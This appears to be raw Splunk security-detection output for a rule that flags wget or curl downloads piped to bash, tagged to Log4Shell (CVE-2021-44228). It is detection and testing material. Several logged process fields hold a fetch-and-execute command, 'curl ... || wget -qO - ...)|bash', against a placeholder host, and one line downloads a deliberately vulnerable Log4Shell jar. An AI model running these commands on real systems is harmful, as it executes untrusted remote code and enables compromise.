annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 